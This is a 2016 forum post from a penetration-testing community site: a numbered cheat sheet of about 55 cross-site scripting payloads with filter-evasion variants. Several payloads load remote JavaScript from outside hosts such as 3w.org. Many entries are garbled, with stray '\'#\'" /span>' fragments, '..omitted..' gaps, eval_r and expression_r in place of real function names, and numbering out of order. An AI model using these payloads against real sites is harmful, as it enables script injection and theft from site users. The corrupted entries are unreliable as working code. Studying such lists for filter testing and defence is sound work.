China Network Penetration Testing Alliance (中国网络渗透测试联盟)
Title: XSS attack summary
Author: admin
Time: 2016-4-28 10:06
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(99) Alternative alert pop-ups
<q/oncut=alert()>1
<s/onclick=alert()>b
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>
(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon, no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=\'#\'" /span>
(11) Embedded tab to split up the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(12) Embedded encoded tab to split up the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC=\'#\'" ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC=\'#\'" ascript:alert('XSS');">

(15) Multi-line embedded JavaScript injection, an extreme XSS example
<IMG SRC=\'#\'" /span>
(16) Working around character limits (requires the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval_r(z)</script>
(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters are basically ineffective domestically, since there is nowhere they can be used
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) IMG tag with spaces and meta characters before the JavaScript
<IMG SRC=\'#\'" javascript:alert('XSS');">
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>
(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC=\'#\'" /span>

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <
(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping the JavaScript filter
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
(31) Input Image
<INPUT SRC=\'#\'" /span>

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC=\'#\'" /span>

(35) IMG Lowsrc
<IMG LOWSRC=\'#\'" /span>

(36) BGSOUND
<BGSOUND SRC=\'#\'" /span>
(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS
(41) META with a URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC=\'#\'" /IFRAME>

(43) Frame
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression_r(alert('XSS'));">

(49) STYLE attribute with a split expression
<IMG STYLE="xss:expression_r(alert('XSS'))">

(50) Anonymous tag with STYLE (made of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression_r(alert('XSS'))">
(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag; you can embed a Flash file that contains XSS
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf" ></EMBED>